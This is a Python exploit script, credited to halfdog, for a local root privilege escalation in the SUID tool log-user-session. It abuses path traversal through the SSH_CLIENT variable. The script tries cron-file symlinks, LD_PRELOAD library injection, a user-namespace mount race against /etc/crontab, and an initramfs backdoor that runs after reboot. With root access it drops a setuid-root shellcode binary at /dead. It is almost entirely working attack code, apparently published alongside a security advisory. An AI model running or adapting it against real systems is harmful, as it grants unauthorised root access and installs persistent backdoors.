#!/usr/bin/python3 -BbbEIsSttW all
#
# This software is provided by the copyright owner "as is" and any
# expressed or implied warranties, including, but not limited to,
# the implied warranties of merchantability and fitness for a particular
# purpose are disclaimed. In no event shall the copyright owner be
# liable for any direct, indirect, incidential, special, exemplary or
# consequential damages, including, but not limited to, procurement
# of substitute goods or services, loss of use, data or profits or
# business interruption, however caused and on any theory of liability,
# whether in contract, strict liability, or tort, including negligence
# or otherwise, arising in any way out of the use of this software,
# even if advised of the possibility of such damage.
#
# Copyright (c) 2018 halfdog <me (%) halfdog.net>
# See https://www.halfdog.net/Security/2018/LogUserSessionLocalRootPrivilegeEscalation/
# for more information.


import os
import subprocess
import sys

def performRootActions():
  """This function is called when the program is invoked as user
  root."""
# Create a minimal 32-bit SUID binary to execute any other command
# with uid 0. The static binary will run both on 32 and 64 bit
# systems.
  testFd = os.open('/dead', os.O_RDWR|os.O_CREAT, mode=0o4755)
  os.write(testFd, b'\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x084\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x004\x00 \x00\x02\x00(\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xa2\x00\x00\x00\xa2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xa4\x00\x00\x00\xa4\x90\x04\x08\xa4\x90\x04\x08\t\x00\x00\x00\t\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001\xc0\x89\xc1\x89\xc2\x89\xc3\xb0\xd0\xcd\x801\xc0\xb0\xd2\xcd\x801\xc0\x89\xc2\xb0\x0b\x89\xe1\x83\xc1\x08\x8b\x19\xcd\x80')
  os.close(testFd)


def readFileContent(fileName):
  """Read the content of a given file.
  @return the content or None if file does not exist."""
  fileData = None
  if os.path.exists(fileName):
    file = open(fileName, 'rb')
    fileData = file.read()
    file.close()
  return fileData


def doSimpleSymlinkEscalation():
  """This function is called to escalate privileges."""
  logData = b'* * * * *\troot\t%s spacer\n' % (
      bytes(os.path.realpath(sys.argv[0]), sys.getdefaultencoding()))
  currentPid = os.getpid()
  linkFileNames = []
  for linkPid in range(currentPid+1, currentPid+5):
    linkName = '/tmp/-%d.log' % linkPid
    os.symlink('/etc/cron.d/escalate', linkName)
    linkFileNames.append(linkName)
  print('Files %s' % repr(linkFileNames))

  processResult = subprocess.run(
      ['/usr/local/bin/log-user-session', '/bin/sh', '-c', 'exec /bin/cat > /dev/null'],
      env={'SSH_CLIENT': '/../../../../../tmp/ 0 0'},
      input=logData)
  for linkName in linkFileNames:
    os.unlink(linkName)
  if os.path.exists('/etc/cron.d/escalate'):
    print(
        'Simple symlink escalation seems successful, wait 1 minute for \n' \
        'cron daemon to complete the attack.')
    return True
  print(
      'Simple symlink escalation failed, maybe symlink protection is\n' \
      'active, see e.g. /proc/sys/fs/protected_symlinks.', file=sys.stderr)
  return False


def doLdPreloadEscalation():
  """This function attempts to escalate privileges by writing
  a shared library and preloading it."""
  sharedLibraryFileName = os.environ.get(
      'ESCALATION_FILE_NAME', 'ExecutableEscalationLibrary')
  if not(os.path.exists(sharedLibraryFileName)):
    print(
        'Shared library file missing for LD_PRELOAD escalation, create\n' \
        '"ExecutableEscalationLibrary" in current working directory\n' \
        'or set ESCALATION_FILE_NAME to point to a library file',
        file=sys.stderr)
    return False

  sharedLibraryFile = open(sharedLibraryFileName, 'rb')
  sharedLibraryData = sharedLibraryFile.read()
  sharedLibraryFile.close()

  processResult = subprocess.run(
      ['/usr/local/bin/log-user-session', '/bin/sh', '-c', 'exec /bin/cat > /dev/null'],
      env={'SSH_CLIENT': '/../../../../../lib/ 0 0'},
      input=sharedLibraryData)

  libFileName = None
  currentUid = os.getuid()
  for fileName in os.listdir('/lib'):
    statData = os.stat('/lib/%s' % fileName)
    if ((statData.st_mode&0o777) == 0o400) and \
        (statData.st_size == len(sharedLibraryData)):
      libFileName = fileName
      break
  if not(libFileName):
    print('Failed to write shared library to /lib', file=sys.stderr)
    return False

# Call the SUID binary again, now injecting the library.
  processResult = subprocess.run(
      ['/usr/local/bin/log-user-session', '/bin/sh', '-c', 'exec /bin/cat > /dev/null'],
      env={'SSH_CLIENT': '/../../../../../tmp/ 0 0',
          'LD_PRELOAD': libFileName},
      input=sharedLibraryData)
  if os.stat('/lib/%s' % libFileName).st_uid == 0:
    print(
        'LD_PRELOAD escalation was successful, use /lib/%s to execute code\n' \
        'as root' % libFileName)
    return True
  print(
      'LD_PRELOAD escalation failed, __libc_enable_secure in elf/dl-load.c\n' \
      'might be active', file=sys.stderr)
  return False


def doUsernsEscalation(targetFileName, targetData):
  """This function attempts to escalate privileges by mounting
  a mount rebinding attack similar to a symlink attack."""
  usernsCloneSetting = readFileContent('/proc/sys/kernel/unprivileged_userns_clone')
  if usernsCloneSetting != b'1\n':
    print('Unprivileged USERNS clone seems disabled (%s), check /proc/sys/kernel/unprivileged_userns_clone setting. Trying to escalate anyway' % repr(usernsCloneSetting), file=sys.stderr)

  oldTargetSize = os.stat(targetFileName).st_size
  usernsProcess = subprocess.Popen(
      ['/usr/bin/unshare', '--map-root-user', '-imnuU', '/bin/sh', '-c',
          'mkdir -- /tmp/userns; cd /tmp/userns; fileName="-$(($$ + 30)).log"; touch -- "${fileName}"; mount -o bind -- "%s" "${fileName}"; sleep 3; umount -- "${fileName}"; rm -- "${fileName}"; cd /; rmdir -- /tmp/userns' % targetFileName])
  targetProcessPid = usernsProcess.pid+30
  attemptEscalation = True
  while True:
    pidData = int(subprocess.check_output(['/bin/sh', '-c', 'echo $$']).strip())
    if pidData >= targetProcessPid:
      print(
          'Skipped target pid %d, maybe machine not idle' % targetProcessPid,
          file=sys.stderr)
      attemptEscalation = False
    if pidData+1 == targetProcessPid:
      break

  if attemptEscalation:
    processResult = subprocess.run(
        ['/usr/local/bin/log-user-session', '/bin/sh', '-c', 'exec /bin/cat > /dev/null'],
        env={'SSH_CLIENT': '/../../../../../proc/%d/cwd/ 0 0' % usernsProcess.pid},
        input=targetData)
  usernsProcess.wait()
  if os.stat(targetFileName).st_size == oldTargetSize:
    print(
        'Target file %s did not change size, USERNS escalation failed' % (
            targetFileName), file=sys.stderr)
    attemptEscalation = False

  return attemptEscalation


def rebootPrivilegeEscalation():
  """This escalation variant works by writing a plain file to
  the initramfs configuration, that will be packaged during next
  run of update-initramfs and sourced during next reboot inside
  the initramfs by /usr/share/initramfs-tools/init.

  To complete escalation, write commands to execute to /tmp/escalate
  after next reboot."""
# Create a configuration file to inject a sleep loop waiting
# for the final payload just before moving to the mounted root
# filesystem. Avoid running the configuration parts while not
# seated in the initrd, thus suppressing warnings during mkinitramfs.
  processResult = subprocess.run(
      ['/usr/local/bin/log-user-session', '/bin/sh', '-c', 'exec /bin/cat > /dev/null'],
      env={'SSH_CLIENT': '/../../../../../usr/share/initramfs-tools/conf.d/zz 0 0'},
      input=b'if test -d /scripts/init-bottom; then\n  cat <<EOF >> /scripts/init-bottom/ORDER\n(cd ${rootmnt}; exec chroot . bin/sh -c \'until /bin/false; do /bin/sleep 10; if test -e /tmp/escalate; then /tmp/escalate; fi; done\') &\nEOF\nfi\n')
  escalationResult = False
  for fileName in os.listdir('/usr/share/initramfs-tools/conf.d'):
    if (fileName.startswith('zz-')) and (fileName.endswith('.log')):
      escalationResult = True
      break
  if escalationResult:
    print('Initramfs reboot escalation seems to be working, wait for next reboot')
  else:
    print('Initramfs reboot escalation seems to have failed', file=sys.stderr)
  return escalationResult


def mainFunction():
  """This is the program main function."""
  if os.getuid() == 0:
    performRootActions()
  else:
    binaryNameBytes = bytes(
        os.path.realpath(sys.argv[0]), sys.getdefaultencoding())
    if not(doSimpleSymlinkEscalation()) and \
        not(doLdPreloadEscalation()) and \
        not(doUsernsEscalation('/etc/crontab', b'* * * * * root %s\n' % binaryNameBytes)) and \
        not(rebootPrivilegeEscalation()):
      print('All escalation methods failed, terminating.', file=sys.stderr)

if __name__ == '__main__':
  mainFunction()
